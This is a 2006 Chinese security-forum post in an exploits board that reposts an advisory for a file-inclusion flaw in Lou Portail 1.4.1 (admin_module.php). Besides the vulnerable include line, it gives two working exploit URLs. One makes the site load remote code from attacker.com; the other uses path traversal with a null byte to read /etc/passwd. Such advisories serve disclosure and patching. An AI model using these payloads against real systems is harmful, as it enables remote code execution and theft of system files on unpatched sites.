Lou Portail 1.4.1 (admin_module.php) Remote File Include Vulnerability

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1119 小时
注册时间: 2007-10-23
最后登录: 2009-1-4

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2006-10-21 11:37 只看该作者

Lou Portail 1.4.1 (admin_module.php) Remote File Include Vulnerability

复制内容到剪贴板

代码:

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##

#                                          #

#        [ Lou Portail 1.4.1 ]                     #

#                                           

# Class:    Remote|Local File Include Vulnerability        #

# Patch:    Unavailable                           #

# Published  2006/10/18                            #

# Remote:   Yes                                

# Local:    No                         #

# Type:    High                                #

# Site:    [url]http://louportail.free.fr/[/url]                 #

# Author:   MP

# Contact:  [email]mp01010@yahoo.com[/email]                 #

#                             #

#################################################################



Vuln Code (admin/admin_module.php):



<?...

  include ("$g_admin_rep/admin_utils.$g_ext");

...?>



#Vuln 1.0 -> require register_globals = On

[url]http://louportail.com/admin/admin_module.php?g_admin_rep=http://attacker.com&g_ext=txt[/url]



#Vuln 2.0 -> require magic_quotes_gpc = Off

[url]http://louportail.com/admin/admin_module.php?g_admin_rep=../../../../../../../../../../../../../../../../../../../../etc/passwd%00[/url]

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Lou Portail 1.4.1 (admin_module.php) Remote File Include Vulnerability